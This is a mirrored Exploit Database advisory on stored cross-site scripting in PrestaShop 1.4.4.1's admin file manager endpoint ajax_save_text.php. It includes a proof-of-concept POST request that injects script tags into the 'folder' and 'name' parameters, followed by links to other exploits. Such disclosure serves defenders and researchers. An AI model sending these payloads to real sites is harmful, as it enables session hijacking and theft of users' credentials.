PrestaShop 1.4.4.1 – ‘/admin/ajaxfilemanager/ajax_save_text.php’ Multiple Cross-Site Scripting Vulnerabilities

Exploit Database
103 阅读

作者： Prestashop

日期： 2011-11-23
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/36344/

source: https://www.securityfocus.com/bid/50784/info

PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected.

GET: http://<app_base>/admin/ajaxfilemanager/ajax_save_text.php

POST: folder=<script>alert('XSS 1');</script>&name=<script>alert('XSS 2');</script>

last Exploits
PrestaShop 1.4.4.1 – ‘/admin/ajaxfilemanager/ajax_save_text.php’ Multiple Cross-Site Scripting Vulnerabilities的更多信息

LeadPro CRM v1.0 – SQL Injection：
Backbone Technology Expression 18.9.2010 – Cross-Site Scripting：
Minify 2.1.x – ‘g’ Cross-Site Scripting：
WordPress Plugin NOSpamPTI – Blind SQL Injection：
Ticketly 1.0 – ‘name’ SQL Injection：
Centreon 2.5.4 – Multiple Vulnerabilities：
Balero CMS 0.7.2 – Multiple Blind SQL Injections：
MemHT Portal 4.0.1 – Persistent Cross-Site Scripting：